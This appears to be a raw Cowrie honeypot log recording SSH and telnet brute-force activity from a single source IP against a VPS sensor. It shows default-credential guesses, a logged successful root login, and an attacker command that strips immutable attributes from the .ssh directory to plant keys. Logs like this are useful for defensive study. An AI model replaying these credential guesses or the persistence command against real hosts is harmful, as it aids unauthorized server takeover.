0\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"","sensor":"my-vps","timestamp":"2025-08-26T05:26:52.125120Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.session.closed","duration":"16.5","message":"Connection lost after 16.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:26:52.469491Z","src_ip":"212.227.235.229","session":"5d3ef0a13ded"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55915,"dst_ip":"1.2.3.4","dst_port":23,"session":"1dd069b45998","protocol":"telnet","message":"New connection: 212.227.235.229:55915 (1.2.3.4:23) [session: 1dd069b45998]","sensor":"my-vps","timestamp":"2025-08-26T05:27:49.698060Z"}
{"eventid":"cowrie.session.closed","duration":30.73357105255127,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:28:20.431550Z","src_ip":"212.227.235.229","session":"1dd069b45998"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46416,"dst_ip":"1.2.3.4","dst_port":22,"session":"724b600a5c27","protocol":"ssh","message":"New connection: 212.227.235.229:46416 (1.2.3.4:22) [session: 724b600a5c27]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.021508Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46442,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b2555ab4b5","protocol":"ssh","message":"New connection: 212.227.235.229:46442 (1.2.3.4:22) [session: 82b2555ab4b5]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.039154Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46456,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ad2019bbd75","protocol":"ssh","message":"New connection: 212.227.235.229:46456 (1.2.3.4:22) [session: 5ad2019bbd75]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.040435Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46430,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebba491ab0ee","protocol":"ssh","message":"New connection: 212.227.235.229:46430 (1.2.3.4:22) [session: ebba491ab0ee]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.041661Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46478,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8d44ad071c4","protocol":"ssh","message":"New connection: 212.227.235.229:46478 (1.2.3.4:22) [session: c8d44ad071c4]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.043637Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46484,"dst_ip":"1.2.3.4","dst_port":22,"session":"54ce09110bd8","protocol":"ssh","message":"New connection: 212.227.235.229:46484 (1.2.3.4:22) [session: 54ce09110bd8]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.044625Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46464,"dst_ip":"1.2.3.4","dst_port":22,"session":"36c33872bcb1","protocol":"ssh","message":"New connection: 212.227.235.229:46464 (1.2.3.4:22) [session: 36c33872bcb1]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.045523Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46500,"dst_ip":"1.2.3.4","dst_port":22,"session":"c178bfb1ff3a","protocol":"ssh","message":"New connection: 212.227.235.229:46500 (1.2.3.4:22) [session: c178bfb1ff3a]","sensor":"my-vps","timestamp":"2025-08-26T05:28:40.046925Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:41.986520Z","src_ip":"212.227.235.229","session":"724b600a5c27"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:41.988163Z","src_ip":"212.227.235.229","session":"724b600a5c27"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.127928Z","src_ip":"212.227.235.229","session":"5ad2019bbd75"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.128591Z","src_ip":"212.227.235.229","session":"5ad2019bbd75"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.130268Z","src_ip":"212.227.235.229","session":"82b2555ab4b5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.130853Z","src_ip":"212.227.235.229","session":"82b2555ab4b5"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.147107Z","src_ip":"212.227.235.229","session":"c8d44ad071c4"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.147710Z","src_ip":"212.227.235.229","session":"c8d44ad071c4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.852621Z","src_ip":"212.227.235.229","session":"c178bfb1ff3a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.854261Z","src_ip":"212.227.235.229","session":"54ce09110bd8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.855096Z","src_ip":"212.227.235.229","session":"54ce09110bd8"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.857463Z","src_ip":"212.227.235.229","session":"36c33872bcb1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:42.858134Z","src_ip":"212.227.235.229","session":"36c33872bcb1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:28:43.174751Z","src_ip":"212.227.235.229","session":"c178bfb1ff3a"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:28:43.441425Z","src_ip":"212.227.235.229","session":"ebba491ab0ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33468,"dst_ip":"1.2.3.4","dst_port":22,"session":"60d1bc443f47","protocol":"ssh","message":"New connection: 212.227.235.229:33468 (1.2.3.4:22) [session: 60d1bc443f47]","sensor":"my-vps","timestamp":"2025-08-26T05:28:43.530358Z"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:28:48.089787Z","src_ip":"212.227.235.229","session":"60d1bc443f47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33612,"dst_ip":"1.2.3.4","dst_port":22,"session":"46b69f6434c3","protocol":"ssh","message":"New connection: 212.227.235.229:33612 (1.2.3.4:22) [session: 46b69f6434c3]","sensor":"my-vps","timestamp":"2025-08-26T05:28:48.178365Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:28:51.096812Z","src_ip":"212.227.235.229","session":"46b69f6434c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33750,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e59110ea07","protocol":"ssh","message":"New connection: 212.227.235.229:33750 (1.2.3.4:22) [session: a5e59110ea07]","sensor":"my-vps","timestamp":"2025-08-26T05:28:51.186387Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:28:54.100443Z","src_ip":"212.227.235.229","session":"a5e59110ea07"}
{"eventid":"cowrie.login.failed","username":"pi","password":"admin","message":"login attempt [pi/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:28:55.882011Z","src_ip":"212.227.235.229","session":"82b2555ab4b5"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"admin","message":"login attempt [ubnt/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:00.440733Z","src_ip":"212.227.235.229","session":"5ad2019bbd75"}
{"eventid":"cowrie.login.failed","username":"student","password":"admin","message":"login attempt [student/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:01.260654Z","src_ip":"212.227.235.229","session":"c8d44ad071c4"}
{"eventid":"cowrie.session.closed","duration":"21.7","message":"Connection lost after 21.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:01.739657Z","src_ip":"212.227.235.229","session":"82b2555ab4b5"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:02.473060Z","src_ip":"212.227.235.229","session":"724b600a5c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56452,"dst_ip":"1.2.3.4","dst_port":22,"session":"94232059fd2d","protocol":"ssh","message":"New connection: 212.227.235.229:56452 (1.2.3.4:22) [session: 94232059fd2d]","sensor":"my-vps","timestamp":"2025-08-26T05:29:02.600107Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:03.472169Z","src_ip":"212.227.235.229","session":"36c33872bcb1"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"admin","message":"login attempt [ftpuser/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T05:29:03.635186Z","src_ip":"212.227.235.229","session":"54ce09110bd8"}
{"eventid":"cowrie.session.closed","duration":"23.8","message":"Connection lost after 23.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:03.826469Z","src_ip":"212.227.235.229","session":"5ad2019bbd75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39086,"dst_ip":"1.2.3.4","dst_port":22,"session":"89a13abdb7b0","protocol":"ssh","message":"New connection: 212.227.235.229:39086 (1.2.3.4:22) [session: 89a13abdb7b0]","sensor":"my-vps","timestamp":"2025-08-26T05:29:03.922879Z"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:06.448995Z","src_ip":"212.227.235.229","session":"94232059fd2d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:06.834442Z","src_ip":"212.227.235.229","session":"89a13abdb7b0"}
{"eventid":"cowrie.session.closed","duration":"28.2","message":"Connection lost after 28.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:08.251517Z","src_ip":"212.227.235.229","session":"724b600a5c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39096,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b77d3e5eb2e","protocol":"ssh","message":"New connection: 212.227.235.229:39096 (1.2.3.4:22) [session: 0b77d3e5eb2e]","sensor":"my-vps","timestamp":"2025-08-26T05:29:08.352821Z"}
{"eventid":"cowrie.session.closed","duration":"29.4","message":"Connection lost after 29.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:09.461673Z","src_ip":"212.227.235.229","session":"36c33872bcb1"}
{"eventid":"cowrie.session.closed","duration":"29.4","message":"Connection lost after 29.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:09.472280Z","src_ip":"212.227.235.229","session":"54ce09110bd8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39106,"dst_ip":"1.2.3.4","dst_port":22,"session":"f01a57451bfe","protocol":"ssh","message":"New connection: 212.227.235.229:39106 (1.2.3.4:22) [session: f01a57451bfe]","sensor":"my-vps","timestamp":"2025-08-26T05:29:09.553945Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39122,"dst_ip":"1.2.3.4","dst_port":22,"session":"07cacd5ce5a0","protocol":"ssh","message":"New connection: 212.227.235.229:39122 (1.2.3.4:22) [session: 07cacd5ce5a0]","sensor":"my-vps","timestamp":"2025-08-26T05:29:09.597531Z"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:11.270476Z","src_ip":"212.227.235.229","session":"0b77d3e5eb2e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:12.484085Z","src_ip":"212.227.235.229","session":"f01a57451bfe"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:12.528102Z","src_ip":"212.227.235.229","session":"07cacd5ce5a0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35428,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bcf2d4c2660","protocol":"ssh","message":"New connection: 212.227.235.229:35428 (1.2.3.4:22) [session: 5bcf2d4c2660]","sensor":"my-vps","timestamp":"2025-08-26T05:29:20.833997Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:29:20.834922Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:29:20.979388Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.login.success","username":"root","password":"america1","message":"login attempt [root/america1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:29:21.602775Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:29:21.946561Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:29:21.947263Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:29:21.948474Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:29:22.094032Z","src_ip":"212.227.235.229","session":"5bcf2d4c2660"}
